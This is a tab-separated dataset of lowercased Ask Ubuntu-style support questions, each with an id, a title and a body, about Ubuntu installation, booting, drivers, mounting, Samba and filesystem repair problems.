341004	unable to locate package openfoam221	while i am executing command **vers= $ ( lsb_release -cs ) sudo sh -c `` echo deb http : //www.openfoam.org/download/ubuntu $ vers main > /etc/apt**/sources.list.d/openfoam.list '' * ] [ 1 ] * i have a file openfoam.list but output of sudo apt-get install openfoam221 is n : ignoring file 'openfoam221_0-1_i386.deb ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'openfoamlist ' in directory '/etc/apt/sources.list.d/ ' as it has no filename extension n : ignoring file 'openfoam221_0-1_i386.deb ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'openfoamlist ' in directory '/etc/apt/sources.list.d/ ' as it has no filename extension n : ignoring file 'openfoam221_0-1_i386.deb ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'openfoamlist ' in directory '/etc/apt/sources.list.d/ ' as it has no filename extension e : unable to locate package openfoam221
341006	how to install debian with encrypted / and passphrase required before login-screen ?	i 'm trying to install debian in my dell inspiron 8gb ram + 500gb hd . althought i could install it without any problems with the regular install and even with a few modifications , i 'm trying to maximize my computers security , and therefore i would like to have the / folder encrypted . not only that , i would also like that the passphrase for it 's encryption was asked before the login screen loaded . the computer will have only one user , and root permissions run trough sudo . so , the question is : how do i get to install debian with a passphrase for encrypted / asked before the login screen ? this is my initial ideia to assure security , but i 'm open to new ideas and other devices i can use for that purpose . thank you very much , ju
341008	why are ubuntu nvidia driver packages so far behind nvidia official recommended releases ?	why does ubuntu wait weeks and sometimes months to release new nvidia driver updates ? it does n't seem to make any sense at all . is this common practice to serve up old drivers and not official nvidia recommended drivers ? background : coming from windows 7 and xp i 'm used to my nvidia drivers being in sync with the official nvidia release cycle and always having extremely fresh drivers available . however with ubuntu it seems that new upstream nvidia releases are delayed for way too long before being released to the main repositories . nvidia ubuntu drivers should always be at the most recent version officially endorsed by nvidia themselves as stable . this affects the quality of the experience i have with nvidia on ubuntu because newer drivers mean greater performance/stability , new features and added support for new nvidia cards . ubuntu needs to embrace a rapid-release cycle where new drivers are quickly put into production and release it to the main repository where all ubuntu can update to it especially for lts users . just filed launchpad bug # 1219908 about my frustration with the slow-release cycle of the nvidia drivers in the main ubuntu repositories and it got upgraded to wishlist . if this problem affects you too you can log into www.launchpad.net and click the âthis affects me tooâ button the bug report and let the package maintainers know that you would like a faster release cycle so you can have access to fresh drivers in sync with official nvidia releases . nvidia official linux drivers list
341014	unlock login screen using command line	is it possible to unlock the 13.04 gnome shell login screen from a command line ? a user is logged in to gnome shell , i can log in to a console as this user . i also have root access . this is for accessing an active x11 display through vnc , without having to enter the password . executing gnome-screensaver-command -d as suggested in a blog post did n't help .
341015	ubuntu 12.04 boot from livecd - `` udev timeout sbin/modprobe -bv '' error message	i 'm trying to install ubuntu 12.04 from livecd . i get the short purple-hue screen at first , but then i get the following error : udev timeout sbin/modprobe -bv pci : v0 ... . this goes on for 2 minutes , after which i get another error message , and after that my screen goes blank . i am an absolute beginner and have no idea why this happens . i have win7 installed . i did n't have any problems with my previous dual boots ( ubuntu 11 + win7 ) . here 's my specs : acer aspire m5201 ( acpi x64 based motherboard ) amd phenom 9100e quad-core , 1.8ghz ati radeon hd3600 ( 2mb ) ram : 4gb any ideas would be greatly appreciated .
341021	what is wrong with my rc.local file ?	i try to run some commands at boot . i learned that one should add them in the /etc/rc.local file ( on ubuntu 12.04 lts ) . here my file : # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . /usr/bin/touch /tmp/test.rc.local exit 0 but after reboot no file was created in /tmp/ which indicates to me that rc.local was never executed . note : rc.local as ( in my opinion ) the right permission : > ls -l rc.local -rwxr-xr-x 1 root root 446 sep 3 15:55 rc.local
341025	black screen on login 12.04.3	i 've recently installed a fresh version of ubuntu 12.04.3 desktop . at login screen , everything is black except for my mouse cursor and blinking underscore at top left . i can hear the ubuntu startup drum sound and can enter desktop by simply entering my password . i 've noticed this starts happening after about the 4th or 5th reboot after install . $ awk '/critical/ || /warning/ ' /var/log/lightdm/x-0-greeter.log ** ( at-spi2-registryd:2210 ) : warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ** ( at-spi2-registryd:2210 ) : warning ** : unable to register client with session manager [ +0.14s ] critical : g_error_free : assertion `error ! = null ' failed [ +0.17s ] warning : indicatorobject class does not have an accessible description . [ +0.21s ] warning : indicatorobject class does not have an accessible description . [ +0.56s ] warning : invalid cast from `gtkmenuitem ' to `indicatormenuitem' [ +0.56s ] warning : invalid cast from `gtkmenuitem ' to `indicatormenuitem' [ +0.56s ] warning : invalid cast from `gtkmenuitem ' to `indicatormenuitem' [ +0.56s ] warning : menubar.vala:561 : indicator object 0x83bde8 not in menubar [ +0.56s ] warning : getting layout failed : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `com.canonical.dbusmenu ' on object at path /com/canonical/indicator/users/menu [ +0.80s ] critical : ido_calendar_menu_item_set_date : assertion `ido_is_calendar_menu_item ( menuitem ) ' failed i 'm having trouble understanding these errors . my graphics card is intel hd 4600 integrated with haswell cpu . $ sudo lightdm -- test-mode failed to use bus name org.freedesktop.displaymanager , do you have appropriate permissions ? upon looking at /etc/dbus-1/system.d/org.freedesktop.displaymanager.conf i see : < ! -- only root can own the service -- > < policy user= '' root '' > < allow own= '' org.freedesktop.displaymanager '' / > < allow send_destination= '' org.freedesktop.displaymanager '' send_interface= '' org.freedesktop.displaymanager '' send_member= '' addseat '' / > < /policy > what 's happening here ? root owns the service , yet i am asked if i have appropriate permissions when accessing as root .
341028	unable to update or install on lubuntu server	i recently downloaded lubuntu server on my apple powerbook g4 . i am unable to install anything on using both ethernet and wireless . i used sudo ethtool eth0 and it was there was a connection . i uninstalled and reinstalled lubuntu multiple times and i am getting the same issue . i am receiving an error on log in when i go to compile a cpp file via vim and g++ i am getting this error : when i go to install g++ this comes up : then i tried installing build-essentials i receive this : after that i tried to update and received this :
341029	how do i ( help ) translate not-yet-localized text in non-english versions of ubuntu ?	in ubuntu and ubuntu-based systems like elementary os for example , i see sometimes text that are not translated from english to swedish ( my native language ) . how can i edit the translation ?
341031	rabbitvcs not working on versioned directories on ubuntu 13.04	i just installed rabbitvcs following this instructions . after that everything looked ok . however , when i tried to use it , i found that the menu and icons disappeared from the versioned directories . more strangely , the menu appears outside of the versioned directory , but once you are inside that directory it stops working at all . it has some strange flash in the `` paste '' option , like it is repainting it or something . how can i make it work ?
341033	dash icon does not work	below is the contents in the ubuntu-software-center-desktop file . the dash home does not show the contents when it is opened up . the icon is black and does not respond when you place your courser over it . root @ carl-presario-v2000-pr433ua-aba : /home/carl/.local/share/applications # cat ubuntu-software-center.desktop [ desktop entry ] name=ubuntu software center genericname=software center comment=lets you choose from thousands of applications available for ubuntu exec=/usr/bin/software-center % u icon=softwarecenter terminal=false type=application categories=packagemanager ; gtk ; system ; settings ; mimetype=application/x-deb ; application/x-debian-package ; x-scheme-handler/apt ; startupnotify=true x-ubuntu-gettext-domain=software-center keywords=sources ; ppa ; install ; uninstall ; remove ; purchase ; catalogue ; store ; root @ carl-presario-v2000-pr433ua-aba : /home/carl/.local/share/applications # trying to fix a gmail issue i tried the following two fixes from another post `` press `` alt + f2 , run dconf-editor '' . the dconf-editor came up but refused to run . i also tried ubuntu software center â search 'unity-webapps ' and look for `` unity web apps for gmail '' then remove it . it was not found . updates fail because gmail is not configured . this all seems to be interrelated . should i reload my software ? these all happened at the same time . also at this time a person brought up a screen and asked if i wanted help with my gmail account . it would appear that someone actually gained access to my computer through the internet . if i reload the system -- how do i guard against that happening again ?
341034	using 13.04 on ancient dell desktop , nvidia geforce 200 , worth trying ?	i have an ancient dell dimension 2400 , with an aftermarket nvidia geforce 200 graphics card ... i installed 13.04 nd the apps seem to work ok but a bit slow , but the desktop is horribly slow , switching windows , opening and closing ubuntu windows all take forever ... i tried downloading the additional drivers , the text in the reviews said `` open a terminal and type `` $ jockey-kde '' but that just got me a command unknown ( or whatever ) how can i install the right drivers , or would it be better for me to go back to version 12.04 or 12.10 ? and if so , how to i make it go back to an earlier version without just performing a full re-install ? thanks
341035	ubuntu install issues uefi/bios asus	hey everyone i have an asus laptop that came with windows 8 and of course uefi ( ugh ) with a 500gb hdd and 20gb sshd , this is a hybrid drive . i tried to wipe windows and install just ubuntu , i did this like normal with a partition scheme as noted below : 10 gb - root on the ssd 100 gb - home on the normal disk 100 gb - var on the normal disk for hosting files / dropbox folder / web dev 1 gb - boot partition on ssd 10 mb - bios boot partition on ssd i left the rest of my drive empty i want to install backtrack also in a dual boot ( that will be another post im sure but im using that live for now ) . after i did this i found that windows was giving me an error upon boot and no linux os 's were detected from the boot menu period . i could also not boot my linux dvd for some reason : s i think installed a linux live usb i had made for fun and when it loaded the bios/uefi i saw my efi usb stick and saw my cd , so i booted from my cd again . ( this was freshly burnt @ 4x from the ubuntu website ) . i thought i found the issue and that was because i did not delete the 4gb windows boot partition , so i deleted it , i 'm thinking i might have made a mistake i read i cant update my bios without it but i do n't know the validity of that statement and can not find a reference . i then proceeded with an an exact install as noted above ( remember i deleted my windows boot partition this time ) . and i received and error that said : no file found grub recovery : or something very close , booted into the uefi/bios and made sure i have csm enabled , secure boot disabled and pxe disabled also ( just checking.. ! ) i do not have an option to boot into anything except my 500gb drive with no grub or boot or bios or root , and a my dvd drive ( thankfully ) so i inserted my ubuntu disk again and i am going to try this once more with the same setup and report back but any help on this topic will be appreciated . i will report my progress asap and keep and eye out . i need this puppy running for school tomorrow and i refuse to find a windows 8 install and i really do n't want to go with windows 7 either i bought this laptop to hack ( ethically of course ) and code not to use skype and play farmville . why do you do this to us microsoft , we do n't want run your resource stealing os unless i need to use itunes , adobe audition , fl studio or ps ( i know , `` gimp '' , yeah whatever ) . even steam can see the future . sorry for venting but this uefi thing is just plain wrong , it must be a legal loophole . ======================================================== update 1 : i think i might of found the issue i didnt choose my dev/sb3 ( boot partition ) as my grub install path i think it was set to dev/sb1 ( which was root ) i also changed all my drives from ext4 to ext3 where applicable . awaiting install procedure ... ======================================================== update 12 : no go same error : i ran the output of ls and saw a few drives ls ( hd0 ) ( hd0 , msdos5 ) ( hd0 , msdos2 ) ( hd1 ) insmod ( hd0 ) /boot/grub/linux.mod unknown filesystem insmod ( hd0 , msdos5 ) /boot/grub/linux.mod file not found insmod ( hd0 , msdos2 ) /boot/grub/linux.mod file not found insmod ( hd1 ) /boot/grub/linux.mod unknown filesystem my uefi/bios sata config shows my 500gb drive as sata 0 and my 24gb drive as sata 1 . i still do not have a boot option for my 24gb ( which is where the grub is ) . i only see my dvd and my 500gb . my sata was set to ahci mode instead of ide . why do these say msdos in them . i found this problem and it was related to the /boot partition not being at the beginning of the drive , i shall try that and report back .
341039	sony vaio vpc-z1 operating system not found	i have a sony z1 laptop signature series that is saying operating system not found when i try to start up the computer . on start up i pressed the f3 button and it shows the samsung ssds as error occurred except on number 3 it showed a non-raid disk . i took it to sony and they told me i might as well buy a new computer because it would cost thousands of dollars to fix . this has been my traveling computer for several years and i ca n't imagine traveling without it help please..
341044	can ubuntu be used with commercial propose ?	i want to use ubuntu on a portable device as os with little modification for device driver and new sets of application . how will i do this ? how is it possible ? i am unaware of all license stuffs .
341048	is it possible to use `musique` to sync with an ipod ?	i was reading online about a program called musique , so i installed it . it 's quite a lot better than rhythmbox in my opinion . the only thing is i ca n't find a way to sync it with my ipod , make playlists , smart or normal , which is annoying because smart playlists and the ability to rate songs are key features i need to be able to manage my ipod . if you have n't got a solution could you direct me to a different opensource program to manage my ipod that can rate songs , and create smart playlists ( and sync with my ipod of course ) that is not clementine , banshee , amarok , songbird , or rhythmbox
341049	samba share for everyone inside network	i 'm sure this is really easy but can get it working and do n't know if it 's some kind of permisson or what . i have one disk mounted as a backup disk in my `` server '' machine , and want to share this directory with everyone in the network . there are many machines , some with windows and some with ubuntu . here is smb.conf of the server machine . [ global ] workgroup = 1 server string = % h server ( samba , ubuntu ) # wins support = no ; wins server = w.x.y.z dns proxy = no # # # # # # # authentication # # # # # # # encrypt passwords = true passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # ; domain logons = yes # # # # # # # # # # # # misc # # # # # # # # # # # # usershare allow guests = yes # ======================= share definitions ======================= [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no [ backups ] comment = backups path = /media/backups writeable = yes browseable = yes guest ok = yes create mask = 0777 directory mask = 0777 in the other ubuntu machines i mount them in /etc/fstab like //server/backups /srv/backups cifs guest , uid=1000 , iocharset=utf8 0 0 windows machines can read and write without problems , but i ca n't get ubuntu machines to do the same thing . do i have to give some permisson to the server folder with chmod to get this working ? maybe i need to give some kind of permisson in mount path of the others ubuntu machines ? cause i tried a lot of combinations of chmod/chown and ca n't get it working ! thanks in advance !
341050	no mirrored mode with vga	i ca n't select mirror screens when i connect other monitor or projector/cannon . i 'm a student , so i need the mirror screen mode . i use elementaryos ( ubntu 12.04 ) , my laptop is a acer v5-571p lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) i need help , please
341051	failed loading skin error message with spotify	i just started having this problem . it started just a min ago . i 'm running xubuntu 12.04 64-bit . i went to synaptic and marked the client for reinstall . did n't work . marked it for uninstallation , uninstalled it , then marked it for reinstallation . still does n't work .
341054	creatiing an iso file	i am trying to convert an iso image so that i can use a usb stick to install ubuntu on my laptop . when i go to startup disk creator and click other the ubuntu iso file has no bytes so i can not create a file to install ubuntu why ?
341055	what causes frequent temporary network outages	i use ubuntu 13.04 and fairly often loose the internet connection . most precisely the connection to the wifi rooter is not lost , i just can not connect to any website or ping an address . this happens randomly and lasts 30-60 sec then internet works again . a few interesting facts : i re installed ubuntu and the problem still happens . i installed windows the problem is not happening another machines connecting to the same rooter do n't have such issue i suspect there is a bad combination of my hardware ( toshiba satellite l655 ) and ubuntu . what may cause this ? how do i start troubleshooting it ?
341056	how to install latest openjdk on ubuntu ?	i know that latest official openjdk is java version `` 1.7.0_25 '' . but there is java version `` 1.7.0_40 '' in development . does anyone know how to install openjdk `` 1.7.0_40 '' on an ubuntu machine ?
341061	13.04 gnome problem with drag and drop and text selection	i have an ubuntu 13.04 gnome 64 bits , but since a few days i am facing serious problem for doing simple drag an drop : in nautilus , in eclipse , in the browser . also i ca n't manage to select text areas with the mouse ( the only way i found is to double click on the first word , then expand selection with shift and arrows keys ) . i noticed that often , after having started a drag n drop , it is cancelled though i did not release the left mouse ! it is as if for each simple mouse clic : two was done ! my graphic card is an ati radeon hd 4330 , and i had installed the default purposed driver . i do n't know if i should give you results from some terminal commands , as i do n't know which could be useful . thanks in advance .
341062	problem when trying to install program . the central program asks to uninstall linux kernel image	when i tried to install the amule and qbittorrent the following error appeared : sorry to be in portuguese , is that i am brazilian . but it says the following error message : to install amule , the following items need to be removed . and the right button is written : install anyway , but when i try to install the error and does not install anything . i tried to install the terminal but from the following error : can someone help me . and excuse me if this question already exists in another post because my english is bad and i do not read very well ( i used a translator to write this ) .
341075	grub rescue prompt after installing grub into sdb	i installed ubuntu minimal 12.04 lts from usb . everything was ok . but , when i try to install grub into /dev/sda , the installation stops with a `` fatal error '' . so , i just entered /dev/sdb ( just tried ) , grub got installed without any problem in /dev/sdb . then , the installation finished without any problem . but after restart , it says 'grub rescue ' . i had only 1 hard drive . so what is sdb ? i thought , usb drive was sda , and my hard drive sdb . is it possible ? how can i fix it ? update 1 i tried boot repair , but it did n't work out . here is my boot info summary by `` boot repair '' . https : //gist.github.com/anonymous/6433404
341078	how fix or reinstall gvim in ubuntu	i tried to use my .vimrc file from windows in ubuntu 12.04 but i am not having success . i also pasted the .vimrc file at the native vimrc file at usr/share/vim but no success . tried to create another file like _vimrc and checked at my home folder the hidden files but there is no ~/vimrc or something like that . so i edited the /usr/share/vim/gvimrc and i am having troubles too . the vim parser reads the code but do n't apply the changes and when deleting it gets to much delay . so i am wondering how to re-install or fix this problem . i am also having this weird ^m at the end of files . so how to fix it ? thanks in advance [ problem of gvim ] http : //i.imgur.com/nebxgvd.png
341088	how do you install 13.04 on a separate hard drive ?	i currently run windows 7 on my 1 tb hard drive , but also have a spare 320 gb hard drive . i have a usb with ubuntu 13.04 loaded on it , and my goal is to have windows 7 on the 1 tb hard drive and ubuntu on the 320 gb hard drive . i know you are supposed to somehow set up partitions so that ubuntu can install properly , but i do n't know what the partitions should be and how big they should be . please advise on how i should install ubuntu on the hard drive . thanks .
341092	option of starting x-terminal or gui at start up	i would like the option of either choosing a terminal session ( x ) or bring up the whole gui . in version 10 , one could move the mouse down to the bottom of the screen and select `` x-term '' , and log in from there . the bulk of the gui would not come up and you were left with a terminal session to execute . or , you could go back to normal . version 12.04 does not appear to have this option , or does it ?
341098	xen 4.3.0 does not boot . no files in /boot/xen/	does anybody know how to install xen 4.3.0 on ubuntu precise ? i 'm compiling from source and all seems fine but it does not boot into the hypervisor . no files appear in '/boot/xen/ ' with a *.gz extension . installing with xen 4.2.2 works fine . i 'm following instructions within the source file download from xenproject . following their instructions as well - http : //wiki.xenproject.org/wiki/compiling_xen_from_source what can cause this ? what 's the fix ?
341106	boot issues on a efi system	i have tried installing ubuntu 13.04 ( amd64 ) on a new gateway pc alongside win8 as well as completely deleting all partitions and installing it as a standalone os . in all cases it will not boot . i have changed the bios to legacy ( turning off secure boot ) . ubuntu install but can not be read at boot . grub2 also appears during the install dialog . help ! ! !
341110	3/5 sata ports not detected	i am running ubuntu 13.04 on a gigabyte ga-h67a-ud3h motherboard . this motherboard has 2 x 6gb/s sata ports ( numbers 0 and 1 ) and 3 x 3gb/s sata ports ( numbers 2 , 3 and 4 ) . any device plugged in to ports 0 or 1 is recognised fine . no device is recognised on ports 2,3 or 4 . how can i further analyse what 's going on and get these other ports working ?
341112	folder mounting issue in ubuntu 12.04	i am having some issue after adding users i am able to access my ftp fine , but while i am trying to mount a shared folder following error : command i am using is sudo mount -- bind /newhd/shareddocs /home/foc error is : mount : special device /newhd/shareddocs does not exist and the result of mount command is $ sudo mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sdb1 on /media/newhd type ext4 ( rw ) gvfs-fuse-daemon on /home/itpchr/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=itpchr ) here are the contents of /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=534bc4e4-868c-4c7c-a026-66338953bd46 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=8b4fed1f-8b32-4b90-9c50-0d4b21b0ebfb none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/sdb1 /media/newhd ext4 please tell me the exact command to mount a shared folder on newhd to foc user directory .
341114	why does grub report two items for windows 7 ?	i did a clean install of windows 7 on the same hard drive . i followed the instructions at : http : //www.howtogeek.com/114884/how-to-repair-grub2-when-ubuntu-wont-boot/ i followed the terminal instructions to restore grub bootloader . whenever i reboot . i see two entries of windows 7 on grub . i do n't recall seeing this the last time . i am aware that windows creates a 'system reserved ' partition ( which is currently on sda1 ) . when i select either of the two boot options , windows 7 boots fine ( so it seems ) . this is what update-grub returns : $ sudo update-grub | tee ~/update-grub.txt [ sudo ] password for christian : generating grub.cfg ... found linux image : /boot/vmlinuz-3.8.0-29-generic found initrd image : /boot/initrd.img-3.8.0-29-generic found linux image : /boot/vmlinuz-3.8.0-27-generic found initrd image : /boot/initrd.img-3.8.0-27-generic found linux image : /boot/vmlinuz-3.8.0-19-generic found initrd image : /boot/initrd.img-3.8.0-19-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 found windows 7 ( loader ) on /dev/sda2 done will booting from the system reserved cause any issues on windows ? why are there two entries of windows 7 instead of 1 ? should i have installed windows 7 without creating a system reserved partition ? is that even an option ? i am on ubuntu 13.04 . my other ubuntu machines only list down 1 entry for windows 7 . ideally , if it had to list down 2 entries . it would be better if it displayed as : found windows 7 ( system reserved ) on /dev/sda1 found windows 7 on /dev/sda2 can this changes be made via a grub configuration file somewhere ?
341118	is java installed by default ?	i 'm asking this because libre office was pre-installed and some of it 's features require java . i do n't want java because of a malicious remote administration tool ( rat ) called jrat and there are also others . but with this even a script kiddie can take control of my computer .
341120	looking for a download manager	i 'm looking a download manager for ubuntu which allows to resume downloading from the last point if a connection is lost . it should be like download master for windows .
341124	is it bad if the update manager does n't show any new updates for a whole week ?	i 've used the 12.04 live cd to get here but installed it awhile ago . i assume until a week ago i was current but now i 'm not so sure . maybe i 'm just being paranoid ?
341125	volume bar automatically changing while playing sound	i am facing issue while playing sound , either through rythmbox or even while playing videos at youtube . i get a randomly volume changed sound . then i observed that the volume bar is actually vibrating left and right whenever i play the sound . things i tried : installed some drivers alsa.. something as per one suggestion at askubuntu . edited the /etc/pulse/default.pa and added tsched=0 as per the requirement . but still , the problem is same . the bar keeps on hovering fast and creating an annoying sound . need your help .
341128	can ubuntu jeos work with xen ?	can i install ubuntu as minimal virtual install ( formarly called ubuntu jeos1 ) on xen hypervisor or not ? does it only support kvm and vmware ? 1 . ubuntu jeos a version of ubuntu that can be installed with the server cd selecting `` minimal virtual machine '' at the install screen .
341130	why do i need a strong password for my ubuntu user account ?	assuming that no one else has physical access to my computer , assuming that i do n't run any unusual services , do i still need a strong password for my ubuntu user account ( it has admin privileges ) ? i 've heard that any ubuntu system connected to the internet needs a strong password because it may somehow affect not only this particular system , but even other machines with internet access as well ( for example , it would be easier to install spambots on a machine with a weak password ) . is this true ? how exactly does this happen ? do i also need strong passwords on my virtualbox test systems ? thank you
341131	boot to black screen , nomodeset does n't help	so , i just got a new lenovo y510p with windows 8 on it by default . i had read up about uefi and all that , and was ready to go when it arrived today . i first tried disabling uefi so i could install 12.04 64 bit because i wanted a stable version . it was a black screen on the installer so i googled it and enabled nomodeset to fix the problem . 12.04 installed fine , but now when i try to boot normally its a black screen again . i assumed it was the same problem so i googled how to enable nomodeset outside of the installer . i found three methods people were saying , this one that says to replace quiet splash with nomodeset in grub , this one which seems to say to replace quiet splash with nomodeset and link it with $ vt_handoff with an underscore , and this one which shows adding nomodeset to the end of the linux /boot line . all of these methods i tried on 12.04 and 13.04 ( with uefi reenabled ) to no avail . however , on two of the methods i did get a list of checks showing if different things pass or fail on which the `` generic graphic drivers '' or something along those lines showed a fail . anything i can do here ? ?
341138	file command reports text/plain for .css file	i 'm trying to get xdg-open to open css files with correct editor , but ca n't get file to report correct mimetype for a file.css file . there is an entry both in /etc/mime.types and a file already exist as /usr/share/mime/text/css.xml but this always happens : ➜ ~ echo `` . { } '' > file.css ➜ ~ file -- mime-type file.css file.css : text/plain ➜ ~ when i trace the code , i see that it uses magic instead of /usr/share/mime/text mime db . how can i get file to report this as text/css instead of text/plain ?
341139	how to fix `` power calibration error '' when trying to burn dvd ?	ubuntu 12.04 lts is not being able to burn any file to a dvd . every time i try to burn anything , it shows an error window and gives this error while burning : scsi error on write ( 786,16 ) : [ 3 73 03 ] power calibration error how can i fix this ?
341140	what happens if i manually change the user environment variable	after running env in the terminal to check if some of my other variables were persistant across settings i noticed the user=xxx environment variable . i 've had to reinstall ubuntu before after fooling around with some system files so this time i 'm nervous to simply experiment with things myself . what would happen if i ran sudo export user=newuser ?
341142	corrupted super block	ok , so this is driving me nuts . i had to hard reboot my machine and now i have superblock issues on my boot disk . i have a lenovo u310 , which comes with two drives , a little ssd , and another 500gb . i installed ubuntu on the ssd and put my home on the 500gb . from everything i can see , the big drive is fine ( thank god ) , but the ssd is having superblock/journaling issues . when i reboot and try to run from the ssd , it gets through grub then throws an error along the line of `` error : failed to write to sector 0x0938e9 . i 'm currently running off a live usb , and i 've looked around and found what i could but nothing seems to work . i 've tried going through the process of updating the superblock from a backup from here . but each one of the backups i try says the same thing : e2fsck 1.42 ( 29-nov-2011 ) e2fsck : bad magic number in super-block while trying to open /dev/sda1 the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > i almost tried running mke2fs -s -b 4096 /dev/sda1 , but it sounds like i should save that for the very end . i 'm not trying to retrieve the data from this drive . i just want to do a clean install of ubuntu but i ca n't because of these errors . is there some way to just wipe it all away and start fresh ? everything i 've found for wiping superblocks is mdadm raid stuff . *edit here 's the output from sudo fdisk -l disk /dev/sda : 24.0 gb , 24015495168 bytes 255 heads , 63 sectors/track , 2919 cylinders , total 46905264 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf6f8853b device boot start end blocks id system /dev/sda1 1 46905263 23452631+ ee gpt disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0004005f device boot start end blocks id system /dev/sdb1 2048 976773119 488385536 83 linux /dev/sda is the problematic ssd , and /dev/sdb is the one with all my ( clean ) data . update just tried clearing the inode , from here . however , it ca n't open the file system : sudo debugfs -w /dev/sda debugfs 1.42 ( 29-nov-2011 ) /dev/sda : bad magic number in super-block while opening filesystem
341143	why same file shows different sizes in different operating systems	i want to give some scenarios : a movie file shows 700 mb in windows but it shows around 735 mb in ubuntu , which is in my drive having ntfs partition . similarly another file shows 446 mb in windows but 467 mb in ubuntu . also when i download files from internet they change once downloaded in ubuntu but do not change in windows . i generally have to upload torrents mentioning the file sizes . most of the time i use ubuntu , i use windows to play games only . actually my questions are : which size should i mention while creating torrents ? is there any tool or software or formula to calculate the file size in ubuntu equivalent to file size in windows ? i have already tried following links but could not find my actual answers : can windows file system files show different size after being copied why would iso file sizes be different in different os ?
341150	unoconv is not working in python	i 've an issue while using unoconv to convert docs to html from a python script . it works perfectly when i run the script or the unoconv commands as root , but it fails when i do the same from other user . i had installed ubuntu 13.04 server and unoconv packages via apt-get install . i executed the python script as an ordinary ( not root ) user > > > from subprocess import call > > > call ( [ `` unoconv '' , '' -f '' , '' html '' , '' -o '' , '' /var/www/project/tagging/templates/documents '' , '' /var/www/project/media/resume1.doc '' ] ) error : unable to connect or start own listener . aborting . ls -l give the following : ubuntu @ ip-54-194-10-89 : /var/www $ ls -l total 183184 drwxr-xr-x 24 www-data www-data 4096 aug 31 15:20 project project has group and ownership as www-data if anyone who can help me with this issue it would be appreciated .
341155	confusing about building openstack packages ?	i found openstack build task on ubuntu qa site , but i am a little confusing about the build steps . here 's the link for build steps : https : //jenkins.qa.ubuntu.com/view/openstack_testing/view/grizzly/job/precise_grizzly_keystone_stable/275/consoletext from the jenkins build log , i know the steps how ubuntu build a openstack packages : get openstack code from github , use git clone build openstack tar.gz file using python setup.py sdist use bzr to get the debian control files which is maintenance by cananical use dch command to generate a new build release and commit it to local use 'bzr builddeb -s -- -sa -us -uc ' to generate source package and related control file , such like 'dsc' sign the package use 'mk-build-deps ' to install dependency use 'sbuild ' to generate the real deb packages upload to testing repos my questions is : in step 5 , we already can generate the deb packages without '-s ' , but why we finally use 'sbuild ' to generate it ? is this only for signature ? what 's the difference between 'bzr builddeb ' and 'sbuild ' ? i found the build scripts which jenkins used is located here : ~openstack-ubuntu-testing/openstack-ubuntu-testing , but when i try to run any commands under bin , i always get : root @ demo : ~/openstack-ubuntu-testing/bin # ./build-package traceback ( most recent call last ) : file `` ./build-package '' , line 14 , in < module > from openstack_ubuntu_testing.build.component_build import componentbuild file `` /home/sysadmin/openstack-ubuntu-testing/bin/openstack_ubuntu_testing/build/component_build.py '' , line 11 , in < module > from schroot.executor import schrootexecutor importerror : no module named schroot.executor i tried to use pip to install schroot , but it seems they do n't have a executor in it . please help .
341159	jack does not have a `` connect '' option , how do i fix this ?	i have been trying to configure jack on my laptop . i think i found part of the problem , and then ran into a new one . on jack , there is no `` connect '' option . `` start '' is missing as well . there are three menu options on the main screen ; quit , setup , and about . hopefully after i fix this issue i will be all set . thank you all in advance .
